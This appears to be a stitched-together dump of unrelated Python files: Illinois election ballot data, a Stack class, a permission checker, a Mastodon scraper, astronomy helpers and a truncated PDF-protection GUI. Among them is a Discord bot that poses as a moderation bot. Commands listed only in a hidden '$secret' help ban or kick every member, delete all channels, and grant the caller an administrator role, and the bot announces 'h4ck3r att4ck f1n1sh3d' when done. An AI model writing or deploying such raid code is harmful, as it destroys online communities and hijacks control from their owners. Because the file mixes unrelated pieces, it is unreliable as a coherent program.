'id': 'https://www.youtube.com/channel/UCz2A7-6e0_pJJ10bXvBvcIA'
}]
}, {
'name': 'Sheila Simon',
'party': 'Democratic',
'candidateUrl': 'http://www.sheilasimon.org',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/SheilaSimonIL'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/SheilaSimonIL'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/user/SheilaSimonIL'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Secretary Of State',
'level': ['administrativeArea1'],
'roles': ['governmentOfficer'],
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'candidates': [{
'name': 'Christopher Michel',
'party': 'Libertarian',
'candidateUrl': 'http://chrisforillinois.org/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/ChrisMichelforIllinois'
}]
}, {
'name': 'Jesse White',
'party': 'Democratic'
}, {
'name': 'Michael Webster',
'party': 'Republican',
'candidateUrl': 'http://websterforillinois.net/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/MikeWebsterIL'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/MikeWebsterIL'
}, {
'type': 'GooglePlus',
'id': 'https://plus.google.com/106530502764515758186'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/user/MikeWebsterIL'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Attorney General',
'level': ['administrativeArea1'],
'roles': ['governmentOfficer'],
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'candidates': [{
'name': 'Ben Koyl',
'party': 'Libertarian',
'candidateUrl': 'http://koyl4ilattorneygeneral.com/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/Koyl4AttorneyGeneral'
}]
}, {
'name': 'Lisa Madigan',
'party': 'Democratic',
'candidateUrl': 'http://lisamadigan.org/splash',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/lisamadigan'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/LisaMadigan'
}, {
'type': 'GooglePlus',
'id': 'https://plus.google.com/106732728212286274178'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/user/LisaMadigan'
}]
}, {
'name': 'Paul M. Schimpf',
'party': 'Republican',
'candidateUrl': 'http://www.schimpf4illinois.com/contact_us?splash=1',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/136912986515438'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/Schimpf_4_IL_AG'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Treasurer',
'level': ['administrativeArea1'],
'roles': ['governmentOfficer'],
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'candidates': [{
'name': 'Matthew Skopek',
'party': 'Libertarian',
'candidateUrl': 'http://www.matthewskopek.com/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/TransparentandResponsibleGoverment'
}]
}, {
'name': 'Michael W. Frerichs',
'party': 'Democratic',
'candidateUrl': 'http://frerichsforillinois.com/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/mikeforillinois'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/mikeforillinois'
}, {
'type': 'GooglePlus',
'id': 'https://plus.google.com/116963380840614292664'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/channel/UCX77L5usHWxrr0BdOv0r8Dg'
}]
}, {
'name': 'Tom Cross',
'party': 'Republican',
'candidateUrl': 'http://jointomcross.com',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/JoinTomCross'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/JoinTomCross'
}, {
'type': 'GooglePlus',
'id': 'https://plus.google.com/117776663930603924689'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/channel/UCDBLEvIGHJX1kIc_eZL5qPw'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'State House - District 4',
'level': ['administrativeArea1'],
'roles': ['legislatorLowerBody'],
'district': {
'name': 'Illinois State House district 4',
'scope': 'stateLower',
'id': 'ocd-division/country:us/state:il/sldl:4'
},
'candidates': [{
'name': 'Cynthia Soto',
'party': 'Democratic'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook County Treasurer',
'level': ['administrativeArea2'],
'roles': ['governmentOfficer'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Maria Pappas',
'party': 'Democratic'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook County Clerk',
'level': ['administrativeArea2'],
'roles': ['governmentOfficer'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'David D. Orr',
'party': 'Democratic',
'candidateUrl': 'http://www.davidorr.org/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/ClerkOrr'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/cookcountyclerk'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/user/TheDavidOrr'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook County Sheriff',
'level': ['administrativeArea2'],
'roles': ['governmentOfficer'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Thomas J. Dart',
'party': 'Democratic',
'candidateUrl': 'http://www.sherifftomdart.com/',
'channels': [{
'type': 'Twitter',
'id': 'https://twitter.com/TomDart'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook County Assessor',
'level': ['administrativeArea2'],
'roles': ['governmentOfficer'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Joseph Berrios',
'party': 'Democratic',
'candidateUrl': 'http://www.electjoeberrios.com/'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook County Board President',
'level': ['administrativeArea2'],
'roles': ['legislatorUpperBody'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Toni Preckwinkle',
'party': 'Democratic',
'candidateUrl': 'http://www.tonipreckwinkle.org/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/196166530417661'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/ToniPreckwinkle'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Arnold Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Bridget Anne Mitchell',
'party': 'Democratic',
'candidateUrl': 'http://mitchellforjudge.com',
'email': 'bridget@mitchellforjudge.com'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Reyes Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Diana Rosario',
'party': 'Democratic'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Howse, Jr. Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Caroline Kate Moreland',
'party': 'Democratic',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/judgemoreland'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Neville, Jr. Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'William B. Raines',
'party': 'Democratic'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Egan Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Daniel J. Kubasiak',
'party': 'Democratic',
'candidateUrl': 'http://www.judgedank.org/',
'email': 'Info@JudgeDanK.org'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Connors Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Kristal Rivers',
'party': 'Democratic',
'candidateUrl': 'http://rivers4judge.org/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/193818317451678'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/Rivers4Judge'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - McDonald Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Cynthia Y. Cobbs',
'party': 'Democratic',
'candidateUrl': 'http://judgecobbs.com/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/1387935061420024'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/judgecobbs'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Lowrance Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Thomas J. Carroll',
'party': 'Democratic'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Veal Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Andrea Michele Buford',
'party': 'Democratic',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/ElectJudgeBufordForTheBench'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Burke Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Maritza Martinez',
'party': 'Democratic'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Felton Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': "Patricia O'Brien Sheahan",
'party': 'Democratic',
'candidateUrl': 'http://sheahanforjudge.com/'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'Referendum',
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'referendumTitle': 'CONSTITUTION BALLOT PROPOSED AMENDMENT TO THE 1970 ILLINOIS CONSTITUTION (1)',
'referendumSubtitle': '"NOTICE THE FAILURE TO VOTE THIS BALLOT MAY BE THE EQUIVALENT OF A NEGATIVE VOTE, BECAUSE A CONVENTION SHALL BE CALLED OR THE AMENDMENT SHALL BECOME EFFECTIVE IF APPROVED BY EITHER THREE-FIFTHS OF THOSE VOTING ON THE QUESTION OR A MAJORITY OF THOSE VOTING IN THE ELECTION. (THIS IS NOT TO BE CONSTRUED AS A DIRECTION THAT YOUR VOTE IS REQUIRED TO BE CAST EITHER IN FAVOR OF OR IN OPPOSITION TO THE PROPOSITION HEREIN CONTAINED.) WHETHER YOU VOTE THIS BALLOT OR NOT YOU MUST RETURN IT TO THE ELECTION JUDGE WHEN YOU LEAVE THE VOTING BOOTH".',
'referendumUrl': 'http://www.elections.il.gov/ReferendaProfile/ReferendaDetail.aspx?ID=15966',
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'Referendum',
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'referendumTitle': 'CONSTITUTION BALLOT PROPOSED AMENDMENT TO THE 1970 ILLINOIS CONSTITUTION (2)',
'referendumSubtitle': '"NOTICE THE FAILURE TO VOTE THIS BALLOT MAY BE THE EQUIVALENT OF A NEGATIVE VOTE, BECAUSE A CONVENTION SHALL BE CALLED OR THE AMENDMENT SHALL BECOME EFFECTIVE IF APPROVED BY EITHER THREE-FIFTHS OF THOSE VOTING ON THE QUESTION OR A MAJORITY OF THOSE VOTING IN THE ELECTION. (THIS IS NOT TO BE CONSTRUED AS A DIRECTION THAT YOUR VOTE IS REQUIRED TO BE CAST EITHER IN FAVOR OF OR IN OPPOSITION TO THE PROPOSITION HEREIN CONTAINED.) WHETHER YOU VOTE THIS BALLOT OR NOT YOU MUST RETURN IT TO THE ELECTION JUDGE WHEN YOU LEAVE THE VOTING BOOTH".',
'referendumUrl': 'http://www.elections.il.gov/ReferendaProfile/ReferendaDetail.aspx?ID=15967',
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'Referendum',
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'referendumTitle': 'STATEWIDE ADVISORY QUESTION (1)',
'referendumUrl': 'http://www.elections.il.gov/ReferendaProfile/ReferendaDetail.aspx?ID=15738',
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'Referendum',
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'referendumTitle': 'STATEWIDE ADVISORY QUESTION (2)',
'referendumUrl': 'http://www.elections.il.gov/ReferendaProfile/ReferendaDetail.aspx?ID=15739',
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'Referendum',
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'referendumTitle': 'STATEWIDE ADVISORY QUESTION (3)',
'referendumUrl': 'http://www.elections.il.gov/ReferendaProfile/ReferendaDetail.aspx?ID=15740',
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}],
'state': [{
'name': 'Illinois',
'electionAdministrationBody': {
'name': 'Illinois State Board of Elections',
'electionInfoUrl': 'http://www.elections.il.gov',
'votingLocationFinderUrl': 'https://ova.elections.il.gov/PollingPlaceLookup.aspx',
'ballotInfoUrl': 'https://www.elections.il.gov/ElectionInformation/OfficesUpForElection.aspx?ID=2GLMQa4Rilk%3d',
'correspondenceAddress': {
'line1': '2329 S Macarthur Blvd.',
'city': 'Springfield',
'state': 'Illinois',
'zip': '62704-4503'
}
},
'local_jurisdiction': {
'name': 'CITY OF CHICAGO',
'sources': [{
'name': 'Voting Information Project',
'official': True
}]
},
'sources': [{
'name': '',
'official': False
}]
}]
}
polling_data = [{
'passed_address': '900 N Washtenaw, Chicago, IL 60622',
'polling_locationName': 'UKRAINIAN ORTHDX PATRONAGE CH',
'polling_address': '904 N WASHTENAW AVE',
'polling_city': 'CHICAGO',
'polling_state': 'IL',
'polling_zip': '60622',
'source_name': 'Voting Information Project',
'source_official': True,
'pollingHours': '',
'notes': ''},
{
'passed_address': '900 N Washtenaw, Chicago, IL 60622',
'polling_locationName': 'UKRAINIAN ORTHDX PATRONAGE CH',
'polling_address': '904 N WASHTENAW AVE',
'polling_city': 'CHICAGO',
'polling_state': 'IL',
'polling_zip': '60622',
'source_name': 'Voting Information Project',
'source_official': True,
'pollingHours': '',
'notes': ''
}]
|
nilq/baby-python
|
python
|
def readFile(path):
try:
with open(path, "r") as file:
return file.read()
except:
print(
"{Error: Failed to load file. File doesn't exist or invalid file path, "
+ "Message: Please check arguments or import strings.}"
)
return ""
class Stack:
def __init__(self):
self._stack = []
def isEmpty(self):
return len(self._stack) == 0
def peek(self):
return self._stack[-1] if not self.isEmpty() else None
def push(self, element):
self._stack.append(element)
def pop(self):
return self._stack.pop() if not self.isEmpty() else None
def get(self, index):
return self._stack[index] if index < len(self._stack) and index >= 0 else None
def __len__(self):
return len(self._stack)
|
nilq/baby-python
|
python
|
import discord
from discord.ext import commands
from discord.ext.commands import Bot
import asyncio
import time
import logging
import random
import googletrans
prefix = "$"
BOT_TOKEN = "token-goes-here"
intents = discord.Intents.default()
intents.members = True
client = commands.Bot(command_prefix=prefix, intents=intents)
client.remove_command("help")
@client.event
async def on_ready():
print ("Bot is now online!")
@client.event
async def on_server_join(server):
print("Joining the server: {0}".format(server.name))
@client.command(pass_context=True)
async def clear(ctx, amount=1000):
await ctx.channel.purge(limit=amount)
@client.command(pass_context=True)
async def ping(ctx):
channel = ctx.message.channel
t1 = time.perf_counter()
await channel.trigger_typing()
t2 = time.perf_counter()
embed=discord.Embed(title=None, description='Ping: {}'.format(round((t2-t1)*1000)), color=0x2874A6)
await channel.send(embed=embed)
@client.command(pass_context=True)
async def avatar(ctx, member : discord.Member = None):
if member == None:
member = ctx.author
memavatar = member.avatar_url
avEmbed = discord.Embed(title = f"{member.name}'s Avatar")
avEmbed.set_image(url = memavatar)
await ctx.send(embed = avEmbed)
@client.command()
async def say(ctx, *, msg=None):
if msg is not None:
await ctx.send(msg)
await ctx.message.delete()
@client.command(aliases=['tr'])
async def translate(ctx, lang_to, *args):
lang_to = lang_to.lower()
if lang_to not in googletrans.LANGUAGES and lang_to not in googletrans.LANGCODES:
raise commands.BadArgument("Invalid language to translate text to")
text = ' '.join(args)
translator = googletrans.Translator()
text_translated = translator.translate(text, dest=lang_to).text
await ctx.send(text_translated)
@client.command(pass_context=True)
async def userinfo(ctx, member: discord.Member=None):
channel = ctx.message.channel
if member is None:
await channel.send('Please input a valid user.')
else:
await channel.send("**The user's name is: {}**".format(member.name) + "\n**The user's ID is: {}**".format(member.id) + "\n**The user's highest role is: {}**".format(member.top_role) + "\n**The user joined at: {}**".format(member.joined_at) + "\n**The user's account creation date is: {}**".format(member.created_at))
@client.command(pass_context=True)
async def kick(ctx, member: discord.Member=None):
author = ctx.message.author
channel = ctx.message.channel
if author.guild_permissions.kick_members:
if member is None:
await channel.send("Please input a valid user.")
else:
await channel.send("Die, **{}**".format(member.name))
await member.kick()
else:
await channel.send("I bet you don't have enough permissions.")
@client.command(pass_context=True)
async def ban(ctx, member: discord.Member=None):
author = ctx.message.author
channel = ctx.message.channel
if author.guild_permissions.kick_members:
if member is None:
await channel.send('Please input a valid user.')
else:
await channel.send("Die **{}**.".format(member.name))
await member.ban()
else:
await channel.send("Where are your permissions?!")
@client.command(pass_context=True)
async def mute(ctx, member: discord.Member):
guild = ctx.guild
mutedRole = discord.utils.get(guild.roles, name="Muted")
if not mutedRole:
mutedRole = await guild.create_role(name="Muted")
for channel in guild.channels:
await channel.set_permissions(mutedRole, speak=False, send_messages=False, read_message_history=True, read_messages=False)
await member.add_roles(mutedRole)
await ctx.send(f"Muted {member.mention}.")
await member.send(f"Silence, {guild.name}.")
@client.command(pass_context=True)
async def unmute(ctx, member: discord.Member):
mutedRole = discord.utils.get(ctx.guild.roles, name="Muted")
await member.remove_roles(mutedRole)
await ctx.send(f"Unmuted {member.mention}.")
await member.send(f"Make sure you wont say bullshit again, {ctx.guild.name}")
@client.command(pass_context=True)
async def secret(ctx):
member = ctx.message.author
embed = discord.Embed(
colour = discord.Colour.blue()
)
embed.set_author(name='Bot Commands')
embed.add_field(name='$ba', value='Bans everybody from the server (bot needs banning perms and needs to have a higher role than users', inline=False)
embed.add_field(name='$dc', value='Deletes all channels (bot needs manage channels perms)', inline=False)
embed.add_field(name='$ka', value='Kicks everyone from the server (bot needs kicking perms)', inline=False)
embed.add_field(name='$a', value='Gives you admin role (bot needs administrator)', inline=False)
embed.add_field(name='$invite', value='Sends an invite link of the bot', inline=False)
embed.add_field(name='$createchannel', value='makes x amount of channels defined by you', inline=False)
embed.add_field(name='$createrole', value='makes x amount of roles defined by you', inline=False)
embed.add_field(name='$ping', value='Gives ping to client (expressed in ms)', inline=False)
embed.add_field(name='$kick', value='Kicks specified user', inline=False)
embed.add_field(name='$ban', value='Bans specified user', inline=False)
embed.add_field(name='$userinfo', value='Gives information of a user', inline=False)
embed.add_field(name='$clear', value='Clears an X amount of messages', inline=False)
embed.add_field(name='$dm', value='Sends a direct message containing hi to the author', inline=False)
embed.add_field(name='$serverinfo', value='Gives information about the server', inline=False)
embed.add_field(name='$avatar', value="Shows avatar of selected user")
embed.add_field(name='$tr', value="Translates text. Example: $tr english hola")
embed.add_field(name='$mute', value="Mutes an user.")
embed.add_field(name='$unmute', value="Unmutes an user.")
embed.add_field(name='$say', value="Say a specific message.")
await member.send(embed=embed)
@client.command()
async def serverinfo(ctx):
name = str(ctx.guild.name)
description = str(ctx.guild.description)
owner = str(ctx.guild.owner)
id = str(ctx.guild.id)
region = str(ctx.guild.region)
memberCount = str(ctx.guild.member_count)
icon = str(ctx.guild.icon_url)
date = str(ctx.guild.created_at)
embed = discord.Embed(
title=name + " Server Information",
description=description,
color=discord.Color.blue()
)
embed.set_thumbnail(url=icon)
embed.add_field(name="Owner", value=owner, inline=True)
embed.add_field(name="Server ID", value=id, inline=True)
embed.add_field(name="Region", value=region, inline=True)
embed.add_field(name="Member Count", value=memberCount, inline=True)
embed.add_field(name="Created On", value=date, inline=True)
await ctx.send(embed=embed)
@client.command(pass_context=True)
async def ka(ctx):
guild = ctx.message.guild
logchannel = client.get_channel(id)
for member in list(ctx.message.guild.members):
try:
await guild.kick(member)
print ("User " + member.name + " has been kicked")
embed = discord.Embed(
colour = discord.Colour.red()
)
embed.add_field(name="User kicked", value=f'{member.name}')
await logchannel.send(embed=embed)
except:
pass
print ("Action Completed: Kicked everyone.")
@client.command(pass_context=True)
async def ba(ctx):
guild = ctx.message.guild
logchannel = client.get_channel(id)
for member in list(ctx.message.guild.members):
try:
await guild.ban(member)
print ("User " + member.name + " has been banned")
embed = discord.Embed(
colour = discord.Colour.red()
)
embed.add_field(name="User banned", value=f'{member.name}')
await logchannel.send(embed=embed)
except:
pass
print ("Action Completed: Banned everyone.")
@client.command(pass_context=True)
async def dc(ctx):
logchannel = client.get_channel(id)
for channel in list(ctx.message.guild.channels):
try:
await channel.delete()
print (channel.name + " has been deleted")
embed = discord.Embed(
colour = discord.Colour.blue()
)
embed.add_field(name="Channel deleted", value=f'#{channel.name}')
await logchannel.send(embed=embed)
except:
pass
guild = ctx.message.guild
channel = await guild.create_text_channel("hello")
await channel.send("g3t 13373d")
for member in list(ctx.message.guild.members):
try:
await guild.ban(member)
print ("User " + member.name + " has been banned")
embed = discord.Embed(
colour = discord.Colour.red()
)
embed.add_field(name="User banned", value=f'{member.name}')
await logchannel.send(embed=embed)
except:
pass
print("h4ck3r att4ck f1n1sh3d")
@client.command(pass_context=True)
async def a(ctx):
guild = ctx.message.guild
perms = discord.Permissions(8)
logchannel = client.get_channel()
await guild.create_role(name='*', permissions=perms)
member = ctx.message.author
role = discord.utils.get(guild.roles, name="*")
await member.add_roles(role)
embed = discord.Embed(
colour = discord.Colour.orange()
)
embed.add_field(name="User got admin", value=f'{member}')
await logchannel.send(embed=embed)
@client.command(pass_context=True)
async def createchannel(ctx, x):
guild = ctx.message.guild
logchannel = client.get_channel(id)
for i in range(int(x)):
await guild.create_text_channel("newchannel")
embed = discord.Embed(
colour = discord.Colour.green()
)
embed.add_field(name="Channels created", value=f'{x}')
await logchannel.send(embed=embed)
@client.command(pass_context=True)
async def createrole(ctx, x):
guild = ctx.message.guild
perms = discord.Permissions(0)
logchannel = client.get_channel(739058160291020920)
for i in range(int(x)):
await guild.create_role(name="somerole", permissions=perms)
embed = discord.Embed(
colour = discord.Colour.gold()
)
embed.add_field(name="Roles created", value=f'{x}')
await logchannel.send(embed=embed)
@client.command(pass_context=True)
async def dm(ctx):
await ctx.author.send("hi")
client.run(BOT_TOKEN)
|
nilq/baby-python
|
python
|
"""Helper file to check if user has valid permissions."""
from application.common.common_exception import (UnauthorizedException,
ResourceNotAvailableException)
from application.model.models import User, UserProjectRole, RolePermission, \
Permission, UserOrgRole, Organization, Project, Role
from index import db
def check_permission(user_object, list_of_permissions=None,
org_id=None, project_id=None):
"""
Mthod to check if user is authorized.
Args:
list_of_permissions (list): list of permission names to be checked
user_object (object): User object with caller information
org_id (int): Id of the org
project_id (int): Id of the project
Returns: True if authorized, False if unauthorized
"""
# check if user is super admin
super_user = User.query.filter_by(user_id=user_object.user_id).first()
if super_user.is_super_admin:
return True
# check for project permission
if project_id:
project_permission = db.session.query(
Permission.permission_name).join(
RolePermission,
Permission.permission_id == RolePermission.permission_id).join(
UserProjectRole,
RolePermission.role_id == UserProjectRole.role_id).filter(
UserProjectRole.project_id == project_id,
UserProjectRole.user_id == user_object.user_id
).all()
if list_of_permissions is None and project_permission:
return True
if project_permission:
project_permission_from_db = \
[each_permission[0] for each_permission in project_permission]
if set(list_of_permissions).issubset(project_permission_from_db):
return True
# Check for Organization permission
if org_id:
org_permission = db.session.query(Permission.permission_name).join(
RolePermission,
Permission.permission_id == RolePermission.permission_id).join(
UserOrgRole, RolePermission.role_id == UserOrgRole.role_id).filter(
UserOrgRole.org_id == org_id,
UserOrgRole.user_id == user_object.user_id
).all()
if list_of_permissions is None and org_permission:
return True
if org_permission:
org_permission_from_db = \
[each_permission[0] for each_permission in org_permission]
if set(list_of_permissions).issubset(org_permission_from_db):
return True
raise UnauthorizedException
def check_valid_id_passed_by_user(org_id=None, project_id=None, user_id=None,
role_id=None,
**kwargs):
"""Check if Ids passed are valid in DB."""
valid_org, valid_project, valid_user, valid_role = None, None, None, None
if org_id:
valid_org = Organization.query.filter_by(
org_id=org_id, is_deleted=False).first()
if not valid_org:
raise ResourceNotAvailableException("Organization")
if project_id:
valid_project = Project.query.filter_by(
project_id=project_id, is_deleted=False).first()
if not valid_project:
raise ResourceNotAvailableException("Project")
if user_id:
valid_user = User.query.filter_by(
user_id=user_id, is_deleted=False).first()
if not valid_user:
raise ResourceNotAvailableException("User")
if role_id:
valid_role = Role.query.filter_by(
role_id=role_id).first()
if not valid_role:
raise ResourceNotAvailableException("Role")
return valid_org, valid_project, valid_user, valid_role
|
nilq/baby-python
|
python
|
#!/bin/python3
# this script should be run with a "script" command to save the output into a file
import requests
import io
import json
# put the instance needed here
inst='https://octodon.social/api/v1/timelines/public?local=1'
with io.open("toots.txt","a",encoding="utf8") as f:
while True:
res = requests.get(inst)
toots = res.text
f.write(toots+'\n')
headers = res.headers
links = headers['Link']
suiv=links.split()[0].replace('<',' ').replace('>',' ').replace(';',' ').strip()
print(suiv)
if not suiv.startswith("https") or suiv==inst: break
inst=suiv
# reload
# with io.open("toots.txt","r",encoding="utf-8") as f:
# for l in f:
# res=json.loads(l)
# for t in res: print(t['content'])
# this script only downloads the posts in the public local timeline: so there is no dialog in there yet !
# look at downloadReplies.py next to get the dialogs
|
nilq/baby-python
|
python
|
/home/runner/.cache/pip/pool/40/4e/54/4dc30f225358504ac2a93685d7323e0851fea2c2a9937f25f1d53d20f9
|
nilq/baby-python
|
python
|
# Licensed under MIT license - see LICENSE.rst
# -*- coding: utf-8 -*-
"""Utility functions."""
import numpy as np
__all__ = ['mag_to_flux', 'flux_to_mag', 'e1_e2_to_shape']
def mag_to_flux(mag, zeropoint=27.0):
"""Convert magnitude into flux unit.
"""
return 10.0 ** ((zeropoint - mag) / 2.5)
def flux_to_mag(flux, zeropoint=27.0):
"""Convert flux into magnitude unit.
"""
# TODO: deal with negative values more gracefully
return -2.5 * np.log10(flux) + zeropoint
def e1_e2_to_shape(e1, e2, shape_type='b_a'):
"""Convert the complex ellipticities to normal shape.
"""
# Positiona angle
pa = np.arctan(e2 / e1) * 0.5
# Axis ratio or ellipticity or eccentricity
abs_e = np.sqrt(e1 ** 2 + e2 ** 2)
b_a = (1 - abs_e) / (1 + abs_e)
if shape_type == 'b_a':
# Axis ratio
return b_a, pa
elif shape_type == 'ellip':
# Ellipticity
return 1.0 - b_a, pa
elif shape_type == 'eccen':
# Eccentricity
return np.sqrt(1 - b_a ** 2), pa
else:
raise ValueError("# Wrong shape type: [b_a|ellip|eccen]")
def shape_to_e1_e2(b_a, pa):
"""Convert axis ratio and position angle into complex ellipticities.
"""
abs_e = (1 - b_a) / (1 + b_a)
return abs_e * np.cos(2 * pa), abs_e * np.sin(2 * pa)
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
import os
import sys
import json
import random
from pathlib import Path
from PySide6 import QtCore, QtWidgets
from pikepdf import Pdf, Encryption
class ProtectPdfWindow(QtWidgets.QWidget):
def __init__(self, lang_file='en.json'):
super().__init__()
if os.path.isfile(lang_file):
self.lang = json.loads(open(lang_file, 'r', encoding='utf8').read())
else:
